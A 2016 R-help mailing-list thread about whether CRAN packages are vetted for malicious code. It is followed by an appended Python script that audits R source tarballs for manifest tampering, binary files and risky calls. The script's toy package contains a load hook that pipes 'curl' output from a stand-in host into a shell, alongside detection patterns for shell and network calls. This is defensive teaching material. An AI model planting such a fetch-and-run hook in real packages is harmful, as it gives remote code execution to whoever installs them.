[R] are R packages safe?
dimitri.liakhovitski at gmail.com
Thu Dec 8 19:16:08 CET 2016
Great to know thanks, Bert!
Do you happen to have a reference that shows that:
-U. Wien checks R packages on submission for malicious code
-R repository servers have filters in place.
On Thu, Dec 8, 2016 at 1:13 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
> On Thu, Dec 8, 2016 at 10:05 AM, Dimitri Liakhovitski
> <dimitri.liakhovitski at gmail.com> wrote:
>> I just thought maybe there is something - about the process of
>> submitting packages or anything like that - that shows that at least
>> some diligence is being done to ensure that a given package is not
>> just a piece of malware from ISIS or Russia.
>> But if you, Bert, say it's not the case, then I'll believe you.
> ** I DID NOT SAY THAT ***
> You asked for **guarantees**. R has none. But of course U. Wien checks
> R packages on submission for malicious code (it is one reason binary
> submissions are generally not permitted) and R repository servers of
> course have filters in place. BUT THERE ARE NO GUARANTEES, explicit or
>> I've asked my question after I received the following email from a
>> partner company (that is a SaS company):
>> They are starting to work with R and we are delivering some R code to
>> them that will run in the background. I mentioned that certain R
>> packages have to be installed in order for the code to run and got
>> "I’m also going to assume that our team will want to vet any package
>> you request. We’re big fans of open source and leveraging 3rd party
>> libraries but are keenly aware of the risks in “inviting strangers
>> into your house”."
>> This is why I asked.
>> So, I guess, my response should be - yes, please, go ahead and "vet"
>> them any way you want.
>> Thank you!
>> On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
>>> 1. What does "Safe" mean???
>>> 2. From the R banner on startup:
>>> "R is free software and comes with ABSOLUTELY NO WARRANTY."
>>> Don't think it could be clearer than that!
>>> Bert Gunter
>>> "The trouble with having an open mind is that people keep coming along
>>> and sticking things into it."
>>> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip )
>>> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski
>>> <dimitri.liakhovitski at gmail.com> wrote:
>>>> Suddenly, I am being asked for a proof that R packages that are not
>>>> "base" are safe. I've never been asked this question before.
>>>> Is there some documentation on CRAN that discusses how it's ensured
>>>> that all "official" R packages have been "vetted" and are safe?
>>>> Thanks a lot!
>>>> Dimitri Liakhovitski
>>>> R-help at r-project.org mailing list -- To UNSUBSCRIBE and more, see
>>>> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html
>>>> and provide commented, minimal, self-contained, reproducible code.
>> Dimitri Liakhovitski
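Added example (not from this thread, from CRAN, or from R itself): a first-pass audit a vetting team could run over a source package tarball before installing it. It is written in Python rather than R so it runs without an R installation, and it does four things that correspond to the points raised in the thread: it checks the per-file MD5 manifest that `R CMD build` writes into the tarball (the same check `tools::checkMD5sums()` performs), compares the tarball's own digest with the `MD5sum` field a CRAN-style `PACKAGES` index publishes for it, flags binary artifacts (the reason binary submissions are frowned upon), and greps load hooks and shell/network calls that run without the user calling anything. The package `demo`, the `PACKAGES` record and the pattern list are constructed for this example; none of it is real CRAN data.

```python
import hashlib
import io
import re
import tarfile

# Constructs that deserve a human look in an R package's sources. .onLoad/.onAttach
# run automatically on library(), so anything there executes without a user call.
SUSPICIOUS = [
    (r"\.onLoad\s*<-|\.onAttach\s*<-", "package load hook"),
    (r"\b(system2?|pipe|shell)\s*\(", "shell command execution"),
    (r"\b(download\.file|url)\s*\(", "network access"),
    (r"\bsource\s*\(", "sources external R code"),
    (r"\bdyn\.load\s*\(", "loads a native shared object"),
    (r"\bSys\.setenv\s*\(", "modifies the environment"),
]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def read_package(data: bytes) -> dict:
    """Return {relative path: bytes} for the regular files in a source tarball,
    with the top-level package directory stripped (demo/R/x.R -> R/x.R)."""
    files = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and "/" in member.name:
                files[member.name.split("/", 1)[1]] = tar.extractfile(member).read()
    return files


def audit_package(data: bytes) -> dict:
    """First-pass review: manifest integrity, binary artifacts, risky code."""
    files = read_package(data)
    findings = {"md5_mismatch": [], "unlisted": [], "binary": [], "suspicious": []}

    # R CMD build writes an MD5 file with one "<md5> *<path>" line per file.
    listed = {}
    for line in files.get("MD5", b"").decode("utf-8", "replace").splitlines():
        m = re.match(r"([0-9a-f]{32})\s+\*?(.+)$", line)
        if m:
            listed[m.group(2)] = m.group(1)

    for path, content in files.items():
        if path == "MD5":
            continue
        if path not in listed:
            findings["unlisted"].append(path)
        elif listed[path] != md5_hex(content):
            findings["md5_mismatch"].append(path)
        if b"\x00" in content:  # compiled object, shared library, or opaque data
            findings["binary"].append(path)
            continue
        text = content.decode("utf-8", "replace")
        for pattern, why in SUSPICIOUS:
            for lineno, line in enumerate(text.splitlines(), 1):
                if re.search(pattern, line):
                    findings["suspicious"].append((path, lineno, why))
    return findings


def tarball_matches_index(data: bytes, package: str, packages_index: str) -> bool:
    """Compare the tarball's digest with the MD5sum field of the package's record
    in a PACKAGES index (DCF format: blank-line separated 'Field: value' records)."""
    for record in packages_index.strip().split("\n\n"):
        fields = dict(re.findall(r"^([A-Za-z0-9]+):\s*(.*)$", record, re.M))
        if fields.get("Package") == package:
            return fields.get("MD5sum") == md5_hex(data)
    return False


def build_sample_tarball(tamper: bool = False) -> bytes:
    """Constructed toy package 'demo' (not a real CRAN package) with a load hook that
    runs a shell command and a stray compiled object. tamper=True edits a file after
    the MD5 manifest was written, as a modified mirror copy would."""
    src = {
        "demo/DESCRIPTION": b"Package: demo\nVersion: 0.1.0\n",
        "demo/NAMESPACE": b'exportPattern("^[[:alpha:]]+")\n',
        "demo/R/hello.R": b"hello <- function() 'hi'\n",
        "demo/R/zzz.R": (b".onLoad <- function(libname, pkgname) {\n"
                         b"  system('curl -s http://example.invalid/x | sh')\n}\n"),
        "demo/src/helper.o": b"\x7fELF\x00\x00not really an object file",
    }
    manifest = "".join(f"{md5_hex(c)} *{p[len('demo/'):]}\n" for p, c in src.items())
    src["demo/MD5"] = manifest.encode()
    if tamper:
        src["demo/R/hello.R"] = b"hello <- function() 'tampered'\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in src.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in audit_package(build_sample_tarball()).items():
        print(key, value)
```

On the constructed package this reports `src/helper.o` as a binary artifact and two lines in `R/zzz.R` (a load hook and a `system()` call) for review; with `tamper=True` it also reports `R/hello.R` as not matching the manifest. To run it on a real package, point `audit_package` at the `.tar.gz` that `download.packages()` fetched and `tarball_matches_index` at the repository's `PACKAGES` file. Note what this does and does not establish: an intact manifest and a matching index digest only show the copy you have is the one the repository published, and an empty `suspicious` list only means the crude patterns did not fire. It is a triage aid for the reviewer the partner company wants to involve, not the guarantee the thread says does not exist.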